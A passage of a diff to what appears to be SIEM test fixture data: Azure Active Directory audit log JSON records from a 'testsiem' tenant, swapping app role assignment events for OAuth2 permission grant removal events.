"User.PUID", "OldValue": "", "NewValue": "1003200096971F55"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "UserManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Name": "extendedAuditEventCategory", "Value": "User"}, {"Name": "targetSPN", "Value": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Name": "targetName", "Value": "siem2"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"User.ObjectID\",\"User.UPN\",\"User.PUID\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "1e80f57e-764e-4c42-bead-7ccf998fe780"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"ObjectClass\":\"User\",\"UPN\":\"asr@testsiem.onmicrosoft.com\",\"PUID\":\"1003200096971F55\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:45:42.1421458Z"}, {"Name": "env_epoch", "Value": "748B6"}, {"Name": "env_seqNum", "Value": "34622843"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR571"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add app role assignment grant to user.", "Id": "fb84e87b-9a45-49bf-91d8-30f3880ca99d"}
-{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:45:42", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Type": 2, "ID": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "siem2"}, {"Type": 2, "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Type": 4, "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}], "ObjectId": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", "ModifiedProperties": [{"Name": "User.ObjectID", "OldValue": "", "NewValue": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "User.UPN", "OldValue": "", "NewValue": "asr@testsiem.onmicrosoft.com"}, {"Name": "User.PUID", "OldValue": "", "NewValue": "1003200096971F55"}, {"NewValue": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", "OldValue": "", "Name": "TargetId.ServicePrincipalNames"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "UserManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Name": "extendedAuditEventCategory", "Value": "User"}, {"Name": "targetSPN", "Value": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Name": "targetName", "Value": "siem2"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"User.ObjectID\",\"User.UPN\",\"User.PUID\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "1e80f57e-764e-4c42-bead-7ccf998fe780"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"ObjectClass\":\"User\",\"UPN\":\"asr@testsiem.onmicrosoft.com\",\"PUID\":\"1003200096971F55\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:45:42.1421458Z"}, {"Name": "env_epoch", "Value": "748B6"}, {"Name": "env_seqNum", "Value": "34622843"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR571"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add app role assignment grant to user.", "Id": "fb84e87b-9a45-49bf-91d8-30f3880ca99d"}
-{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:45:42", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Type": 2, "ID": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "siem2"}, {"Type": 2, "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Type": 4, "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}], "ObjectId": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", "ModifiedProperties": [{"Name": "User.ObjectID", "OldValue": "", "NewValue": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"NewValue": "asr@testsiem.onmicrosoft.com", "OldValue": "", "Name": "User.UPN"}, {"Name": "User.PUID", "OldValue": "", "NewValue": "1003200096971F55"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "UserManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Name": "extendedAuditEventCategory", "Value": "User"}, {"Name": "targetSPN", "Value": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Name": "targetName", "Value": "siem2"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"User.ObjectID\",\"User.UPN\",\"User.PUID\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "1e80f57e-764e-4c42-bead-7ccf998fe780"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"ObjectClass\":\"User\",\"UPN\":\"asr@testsiem.onmicrosoft.com\",\"PUID\":\"1003200096971F55\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:45:42.1421458Z"}, {"Name": "env_epoch", "Value": "748B6"}, {"Name": "env_seqNum", "Value": "34622843"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR571"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add app role assignment grant to user.", "Id": "fb84e87b-9a45-49bf-91d8-30f3880ca99d"}
+{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:16:18", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6"}, {"Type": 2, "ID": "98528ef9-e89b-469a-b19b-fa8e72a00fa6"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Microsoft Graph"}, {"Type": 2, "ID": "00000003-0000-0000-c000-000000000000"}, {"Type": 4, "ID": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us"}], "ObjectId": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": ""}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": ""}, {"NewValue": "", "OldValue": "", "Name": "ServicePrincipal.Name"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "98528ef9-e89b-469a-b19b-fa8e72a00fa6"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us"}, {"Name": "targetName", "Value": "Microsoft Graph"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "2e358876-29c8-45b5-8dba-e233cf769988"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":null,\"ObjectClass\":\"ServicePrincipal\",\"AppId\":null,\"Name\":null}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-10T15:16:18.9844570Z"}, {"Name": "env_epoch", "Value": "Z4XUI"}, {"Name": "env_seqNum", "Value": "43649666"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##b2c3071c-9589-469b-9fb1-9311682625c0_00000000-0000-0000-0000-000000000000_b2c3071c-9589-469b-9fb1-9311682625c0"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR581"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Remove OAuth2PermissionGrant.", "Id": "ec6ba716-ec04-460a-8d9e-661d732c4689"}
+{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:16:18", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6"}, {"Type": 2, "ID": "98528ef9-e89b-469a-b19b-fa8e72a00fa6"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Microsoft Graph"}, {"Type": 2, "ID": "00000003-0000-0000-c000-000000000000"}, {"Type": 4, "ID": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us"}], "ObjectId": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": ""}, {"NewValue": "", "OldValue": "", "Name": "ServicePrincipal.AppId"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": ""}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "98528ef9-e89b-469a-b19b-fa8e72a00fa6"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us"}, {"Name": "targetName", "Value": "Microsoft Graph"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "2e358876-29c8-45b5-8dba-e233cf769988"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":null,\"ObjectClass\":\"ServicePrincipal\",\"AppId\":null,\"Name\":null}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-10T15:16:18.9844570Z"}, {"Name": "env_epoch", "Value": "Z4XUI"}, {"Name": "env_seqNum", "Value": "43649666"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##b2c3071c-9589-469b-9fb1-9311682625c0_00000000-0000-0000-0000-000000000000_b2c3071c-9589-469b-9fb1-9311682625c0"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR581"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Remove OAuth2PermissionGrant.", "Id": "ec6ba716-ec04-460a-8d9e-661d732c4689"}
+{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:16:18", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6"}, {"Type": 2, "ID": "98528ef9-e89b-469a-b19b-fa8e72a00fa6"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Microsoft Graph"}, {"Type": 2, "ID": "00000003-0000-0000-c000-000000000000"}, {"Type": 4, "ID": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us"}], "ObjectId": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us", "ModifiedProperties": [{"NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23", "OldValue": "", "Name": "ServicePrincipal.ObjectID"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": ""}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": ""}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": ""}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "98528ef9-e89b-469a-b19b-fa8e72a00fa6"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us"}, {"Name": "targetName", "Value": "Microsoft Graph"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "2e358876-29c8-45b5-8dba-e233cf769988"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": 